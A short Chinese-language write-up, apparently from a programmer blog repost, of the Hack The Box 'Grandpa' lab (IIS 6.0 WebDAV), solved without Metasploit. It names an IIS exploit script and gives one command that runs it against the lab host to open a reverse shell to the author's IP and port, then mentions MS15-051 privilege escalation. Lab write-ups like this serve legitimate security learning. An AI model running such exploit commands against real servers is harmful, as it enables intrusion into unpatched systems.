hackthebox-grandpa(考点:iis6.0)不用MSF
程序员文章站
2022-03-24 08:29:52
...
这靶机绝大部分人都是msf做的,毕竟适合这个靶机的漏洞文件没多少(还是中国人发现的呢),都是和msf相关,(而且用msf做也很不稳定,这靶机在论坛里也被吐槽),我好不容易找到个非msf的方法
nmap
从名字就可以看出。grandpa老爷爷和granny老奶奶这篇很像,没啥突破口,就是webdav信息多
故地重游
再来扫webdav
但是这次不一样了,都是fail
最后只能网上搜啊搜。。。搜到explodingcan ,也是用msf,我想把shellcode改成非msf。但改了也没效果
终于这个终于至少能拿低级别的shell
直接考下来。不用改,指令里加自己的ip和端口。不行的话,把靶机多重启几次
python iis.py 10.10.10.14 80 10.10.14.3 4444
收到,运行很慢,难怪这么多人吐槽此靶机。。
进去还是老套路,参考老奶奶那篇吧,用15-051,能收到shell但瞬间就断了。最后还是用的老奶奶那篇的提权exe。
收到。搞定。进去找txt,很卡,很慢。无语。。。。